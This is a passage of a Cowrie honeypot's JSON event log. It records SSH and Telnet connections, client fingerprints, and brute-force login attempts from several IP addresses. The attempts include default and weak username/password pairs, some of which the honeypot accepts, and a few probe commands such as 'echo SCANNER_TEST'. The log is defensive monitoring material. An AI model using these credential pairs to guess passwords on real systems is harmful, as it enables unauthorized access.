57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T14:56:20.564294Z","src_ip":"212.227.235.229","session":"3f884592997c"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"frappe","message":"login attempt [frappe/frappe] failed","sensor":"my-vps","timestamp":"2025-08-26T14:56:21.110345Z","src_ip":"212.227.235.229","session":"3f884592997c"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"123456","message":"login attempt [frappe/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T14:56:22.239194Z","src_ip":"212.227.235.229","session":"3f884592997c"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"12345","message":"login attempt [frappe/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T14:56:23.376390Z","src_ip":"212.227.235.229","session":"3f884592997c"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"abc123","message":"login attempt [frappe/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T14:56:24.504721Z","src_ip":"212.227.235.229","session":"3f884592997c"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"abcd123","message":"login attempt [frappe/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-26T14:56:25.644813Z","src_ip":"212.227.235.229","session":"3f884592997c"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:56:26.774033Z","src_ip":"212.227.235.229","session":"3f884592997c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47034,"dst_ip":"1.2.3.4","dst_port":22,"session":"82dd7a6192fb","protocol":"ssh","message":"New connection: 212.227.235.229:47034 (1.2.3.4:22) [session: 82dd7a6192fb]","sensor":"my-vps","timestamp":"2025-08-26T14:56:48.437117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:56:49.047191Z","src_ip":"212.227.235.229","session":"82dd7a6192fb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T14:56:49.048297Z","src_ip":"212.227.235.229","session":"82dd7a6192fb"}
{"eventid":"cowrie.login.success","username":"root","password":"Nalin@123","message":"login attempt [root/Nalin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:56:51.472521Z","src_ip":"212.227.235.229","session":"82dd7a6192fb"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:56:52.586300Z","src_ip":"212.227.235.229","session":"82dd7a6192fb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65016,"dst_ip":"1.2.3.4","dst_port":22,"session":"93ac06360d88","protocol":"ssh","message":"New connection: 217.72.205.35:65016 (1.2.3.4:22) [session: 93ac06360d88]","sensor":"my-vps","timestamp":"2025-08-26T14:56:55.783800Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:56:55.784963Z","src_ip":"217.72.205.35","session":"93ac06360d88"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":42780,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fa728dc9853","protocol":"ssh","message":"New connection: 45.88.8.186:42780 (1.2.3.4:22) [session: 5fa728dc9853]","sensor":"my-vps","timestamp":"2025-08-26T14:59:19.672110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:59:20.511925Z","src_ip":"45.88.8.186","session":"5fa728dc9853"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T14:59:20.512855Z","src_ip":"45.88.8.186","session":"5fa728dc9853"}
{"eventid":"cowrie.login.success","username":"root","password":"19861987","message":"login attempt [root/19861987] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:59:23.834213Z","src_ip":"45.88.8.186","session":"5fa728dc9853"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:59:24.686834Z","src_ip":"45.88.8.186","session":"5fa728dc9853"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35344,"dst_ip":"1.2.3.4","dst_port":23,"session":"bbd76e0d553f","protocol":"telnet","message":"New connection: 212.227.235.229:35344 (1.2.3.4:23) [session: bbd76e0d553f]","sensor":"my-vps","timestamp":"2025-08-26T14:59:30.487222Z"}
{"eventid":"cowrie.session.closed","duration":31.303823709487915,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:00:01.790977Z","src_ip":"212.227.235.229","session":"bbd76e0d553f"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.89.172","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"edebcd5ba8ba","protocol":"ssh","message":"New connection: 64.226.89.172:6103 (1.2.3.4:22) [session: edebcd5ba8ba]","sensor":"my-vps","timestamp":"2025-08-26T15:00:56.808687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T15:00:56.846106Z","src_ip":"64.226.89.172","session":"edebcd5ba8ba"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T15:00:56.860282Z","src_ip":"64.226.89.172","session":"edebcd5ba8ba"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T15:00:57.537572Z","src_ip":"64.226.89.172","session":"edebcd5ba8ba"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:00:57.539018Z","src_ip":"64.226.89.172","session":"edebcd5ba8ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57212,"dst_ip":"1.2.3.4","dst_port":23,"session":"f6dfb190499d","protocol":"telnet","message":"New connection: 212.227.125.160:57212 (1.2.3.4:23) [session: f6dfb190499d]","sensor":"my-vps","timestamp":"2025-08-26T15:02:38.993763Z"}
{"eventid":"cowrie.session.closed","duration":31.770692586898804,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:03:10.764378Z","src_ip":"212.227.125.160","session":"f6dfb190499d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51112,"dst_ip":"1.2.3.4","dst_port":22,"session":"16aad98a023e","protocol":"ssh","message":"New connection: 217.72.205.35:51112 (1.2.3.4:22) [session: 16aad98a023e]","sensor":"my-vps","timestamp":"2025-08-26T15:03:28.856462Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:03:28.857592Z","src_ip":"217.72.205.35","session":"16aad98a023e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51997,"dst_ip":"1.2.3.4","dst_port":23,"session":"acc2ca40a5e3","protocol":"telnet","message":"New connection: 212.227.125.160:51997 (1.2.3.4:23) [session: acc2ca40a5e3]","sensor":"my-vps","timestamp":"2025-08-26T15:04:24.760385Z"}
{"eventid":"cowrie.session.closed","duration":12.666768074035645,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:04:37.426326Z","src_ip":"212.227.125.160","session":"acc2ca40a5e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33874,"dst_ip":"1.2.3.4","dst_port":23,"session":"8d2963f48cba","protocol":"telnet","message":"New connection: 212.227.125.160:33874 (1.2.3.4:23) [session: 8d2963f48cba]","sensor":"my-vps","timestamp":"2025-08-26T15:05:18.550873Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:05:18.635323Z","src_ip":"212.227.125.160","session":"8d2963f48cba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:05:18.652596Z","src_ip":"212.227.125.160","session":"8d2963f48cba"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T15:05:18.653882Z","src_ip":"212.227.125.160","session":"8d2963f48cba"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T15:05:18.654701Z","src_ip":"212.227.125.160","session":"8d2963f48cba"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":37418,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b97cc64b4a1","protocol":"ssh","message":"New connection: 193.32.162.145:37418 (1.2.3.4:22) [session: 8b97cc64b4a1]","sensor":"my-vps","timestamp":"2025-08-26T15:06:28.131827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:06:28.132821Z","src_ip":"193.32.162.145","session":"8b97cc64b4a1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T15:06:28.164805Z","src_ip":"193.32.162.145","session":"8b97cc64b4a1"}
{"eventid":"cowrie.login.failed","username":"validator","password":"solana","message":"login attempt [validator/solana] failed","sensor":"my-vps","timestamp":"2025-08-26T15:06:28.257066Z","src_ip":"193.32.162.145","session":"8b97cc64b4a1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:06:29.289720Z","src_ip":"193.32.162.145","session":"8b97cc64b4a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51232,"dst_ip":"1.2.3.4","dst_port":23,"session":"eabf88524c96","protocol":"telnet","message":"New connection: 212.227.125.160:51232 (1.2.3.4:23) [session: eabf88524c96]","sensor":"my-vps","timestamp":"2025-08-26T15:06:47.722170Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":50882,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed6113e4d396","protocol":"ssh","message":"New connection: 45.88.8.215:50882 (1.2.3.4:22) [session: ed6113e4d396]","sensor":"my-vps","timestamp":"2025-08-26T15:06:49.302950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:06:49.667802Z","src_ip":"45.88.8.215","session":"ed6113e4d396"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T15:06:49.668496Z","src_ip":"45.88.8.215","session":"ed6113e4d396"}
{"eventid":"cowrie.login.success","username":"root","password":"Nalin@123","message":"login attempt [root/Nalin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:06:51.913890Z","src_ip":"45.88.8.215","session":"ed6113e4d396"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:06:52.382117Z","src_ip":"45.88.8.215","session":"ed6113e4d396"}
{"eventid":"cowrie.session.closed","duration":31.632328510284424,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:07:19.354398Z","src_ip":"212.227.125.160","session":"eabf88524c96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34818,"dst_ip":"1.2.3.4","dst_port":23,"session":"c085827aabb9","protocol":"telnet","message":"New connection: 212.227.125.160:34818 (1.2.3.4:23) [session: c085827aabb9]","sensor":"my-vps","timestamp":"2025-08-26T15:07:42.216260Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56762,"dst_ip":"1.2.3.4","dst_port":23,"session":"a67edbf4b69b","protocol":"telnet","message":"New connection: 212.227.125.160:56762 (1.2.3.4:23) [session: a67edbf4b69b]","sensor":"my-vps","timestamp":"2025-08-26T15:08:06.953477Z"}
{"eventid":"cowrie.session.closed","duration":31.163752794265747,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:08:13.379932Z","src_ip":"212.227.125.160","session":"c085827aabb9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:08:18.658843Z","src_ip":"212.227.125.160","session":"8d2963f48cba"}
{"eventid":"cowrie.session.closed","duration":180.11173129081726,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:08:18.662532Z","src_ip":"212.227.125.160","session":"8d2963f48cba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58230,"dst_ip":"1.2.3.4","dst_port":23,"session":"9178914f71ea","protocol":"telnet","message":"New connection: 212.227.125.160:58230 (1.2.3.4:23) [session: 9178914f71ea]","sensor":"my-vps","timestamp":"2025-08-26T15:08:32.598740Z"}
{"eventid":"cowrie.session.closed","duration":5.415034770965576,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:08:38.013674Z","src_ip":"212.227.125.160","session":"9178914f71ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58242,"dst_ip":"1.2.3.4","dst_port":23,"session":"c9bcf82ea3c1","protocol":"telnet","message":"New connection: 212.227.125.160:58242 (1.2.3.4:23) [session: c9bcf82ea3c1]","sensor":"my-vps","timestamp":"2025-08-26T15:08:38.170122Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:08:38.679663Z","src_ip":"212.227.125.160","session":"c9bcf82ea3c1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:08:38.740294Z","src_ip":"212.227.125.160","session":"c9bcf82ea3c1"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T15:08:38.924840Z","src_ip":"212.227.125.160","session":"c9bcf82ea3c1"}
{"eventid":"cowrie.session.closed","duration":32.197757720947266,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:08:39.151164Z","src_ip":"212.227.125.160","session":"a67edbf4b69b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:08:40.027991Z","src_ip":"212.227.125.160","session":"c9bcf82ea3c1"}
{"eventid":"cowrie.session.closed","duration":1.863807201385498,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:08:40.033963Z","src_ip":"212.227.125.160","session":"c9bcf82ea3c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42604,"dst_ip":"1.2.3.4","dst_port":23,"session":"ce88597bdca3","protocol":"telnet","message":"New connection: 212.227.235.229:42604 (1.2.3.4:23) [session: ce88597bdca3]","sensor":"my-vps","timestamp":"2025-08-26T15:08:42.589035Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57182,"dst_ip":"1.2.3.4","dst_port":23,"session":"5546a857beb6","protocol":"telnet","message":"New connection: 212.227.125.160:57182 (1.2.3.4:23) [session: 5546a857beb6]","sensor":"my-vps","timestamp":"2025-08-26T15:09:03.728085Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45662,"dst_ip":"1.2.3.4","dst_port":23,"session":"55487357dc06","protocol":"telnet","message":"New connection: 212.227.125.160:45662 (1.2.3.4:23) [session: 55487357dc06]","sensor":"my-vps","timestamp":"2025-08-26T15:09:12.060144Z"}
{"eventid":"cowrie.session.closed","duration":30.53179121017456,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:09:13.120764Z","src_ip":"212.227.235.229","session":"ce88597bdca3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34780,"dst_ip":"1.2.3.4","dst_port":22,"session":"09ba58e564e2","protocol":"ssh","message":"New connection: 212.227.235.229:34780 (1.2.3.4:22) [session: 09ba58e564e2]","sensor":"my-vps","timestamp":"2025-08-26T15:09:13.378094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:09:13.379411Z","src_ip":"212.227.235.229","session":"09ba58e564e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH